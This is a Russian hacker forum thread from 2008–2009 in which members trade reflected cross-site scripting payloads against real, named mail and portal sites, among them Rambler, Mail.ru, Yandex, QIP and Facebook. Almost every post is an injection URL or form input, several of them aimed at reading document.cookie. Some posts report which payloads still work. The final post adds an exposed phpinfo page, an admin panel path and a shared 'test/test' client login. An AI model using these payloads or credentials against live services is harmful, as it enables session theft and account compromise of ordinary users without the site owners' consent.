Форум АНТИЧАТ - Пассивные xss на почтовых серверах

Страница 1 из 4

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Пассивные xss на почтовых серверах (https://forum.antichat.xyz/showthread.php?t=88986)

Constantine

25.10.2008 15:54

Пассивные xss на почтовых серверах

Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

TreV@N

26.10.2008 11:32

rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

cash$$$

26.10.2008 21:55

http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

TreV@N

27.10.2008 06:26

Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>aler t(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert( 'TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&wha t=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script >alert('TreV@N')</script>&hu=1&what=0

S0ulVortex

15.11.2008 22:41

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

foopi

20.11.2008 00:23

пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

.dimoN.

20.11.2008 01:22

Цитата:

Сообщение от S0ulVortex

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

по твоему же примеру

Код:

http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E

cash$$$

22.11.2008 02:28

http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

Ded MustD!e

23.11.2008 20:45

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

Luccifer

25.11.2008 16:57

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer') </script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Luccifer

25.11.2008 16:59

Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phras e=&proto=1&url=%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cper son=&email=&phone=&fax=&address=&keywords=&session _id=16073130&category_id=10993&category_name=%CC%E 5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&p age=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Lu ccifer')%3C%2Fscript%3E&password=

http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealer t('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>

http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470

http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>

ImpLex

14.12.2008 17:56

http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000 000000000000000000003&pubMode=%3Cscript%3Ealert()% 3C/script%3E
Была активная XSS, но топик для пассивных.

S0ulVortex

19.12.2008 22:20

Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5& form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>

Jazz	26.12.2008 11:24

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>

http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?

faza02

26.12.2008 11:31

не работают.

Код:

http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E

эта работает.

The matrix

31.12.2008 21:21

Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно

Цитата:

http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E

iddqd

04.01.2009 15:37

Gala.net

Код:

http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and

iddqd

04.01.2009 18:14

ВШтате

Код:

http://vshtate.ru/reg?op=message&email=[XSS]

Но если авторизован, то не пашет :(
Короче, бесполезная :(
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек :(

baltazar

05.01.2009 16:05

Facebook.com

Код:

http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript

%3Ealert(document.cookie)%3C/script%3E

только толку от нее нету:(

lmns	10.01.2009 22:33

http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lm ns")</script>

iddqd

12.01.2009 18:52

Мой Круг [Яндекс]

Цитата:

http://moikrug.ru/mates/search/all/russia/?search="/>XSS

iddqd

13.01.2009 13:36

m@il.com

Цитата:

http://mail01.mail.com/scripts/help/help.cgi?type=search&lang=us&string=XSS

iddqd

13.01.2009 23:22

МИРТЕСЕН

Код:

http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>

Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.

iddqd

15.01.2009 13:45

Снова i.ua - на этот раз пассивка ;)

http://events.i.ua/search/?words=</title>XSS&type=text

TreV@N

16.01.2009 19:24

http://mail.kinozal.tv/

http://kinozal.tv/login.php?returnto={XSS}

TreV@N

16.01.2009 19:31

http://webmail.rin.ru/

http://search.rin.ru/?text={XSS}

Zikko

23.01.2009 20:37

на сайте http://www.mylivepage.ru в поле для поиска

Цитата:

"><script>alert('xss')</script>

Dimi4

27.01.2009 22:49

META.UA (Поисковик, почта...)

Цитата:

http://meta.ua/ua/?rgn=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ur

Ну и так, в придачу rutube.ru :D + раскрытие путей

http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%2 0src=javascript:alert(document.cookie)%3E
/var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658

Sin3v

31.01.2009 23:20

Mail.ru

Цитата:

http://hosting.mail.ru/lc.jsp?loginput=&login=123&password=%22%3E%3Cscrip t%3Ealert(%27Sin3v%27)%3C/script%3E

TreV@N

04.02.2009 07:20

e-mail.ru

Цитата:

http://www.e-mail.ru/webmail.ok?cmd=calendar&month={xss}

Найдена лично мной

Sin3v

06.02.2009 15:02

e-mail.ru

Цитата:

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

А это лично мной)

MaDfUn

17.02.2009 19:41

Работает в IE

Код:

http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script>

iddqd

18.02.2009 14:29

A.UA - унылый веб2.0 сервис (бета)

Цитата:

http://web20.a.ua/searchresults?query=[XSS]&stype=all

Цитата:

http://web20.a.ua/slovo?query=[XSS]&stype=word

Цитата:

http://web20.a.ua/radio?query="/>[XSS]&stype=radio

и так далее

Sleep

03.03.2009 13:55

Rambler

Цитата:

http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>

тестил в Опере

Dr.Frank

11.03.2009 22:39

Цитата:

http://news.mail.ru/politics/2416467'%20onmouseover='javascript:alert(document. cookie)';a='/useit/

Для реализации надо навести мышкой на поле ввода

Shaitan-Devil

12.03.2009 09:38

yandex

Код:

http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

xcedz

27.03.2009 00:13

http://go.mail.ru/frame.html?imgurl=xss

иддкд

05.04.2009 02:22

http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(do cument.cookie)%3C/script%3E

xcedz

09.04.2009 02:46

http://paint.kards.qip.ru/compose/edit/2292/?card_id=xss

2fed	09.05.2009 00:32

phpinfo
http://fo2.rambler.ru/info.php phpinfo

хсс
http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

админка
http://in.fo2.rambler.ru/administrator/index.php?

и ещё
http://ad.rambler.ru/
CLIENTS LOGIN

логин=test
пасс=test

Время: 14:00

Страница 1 из 4

Показывать 40 сообщений этой темы на одной странице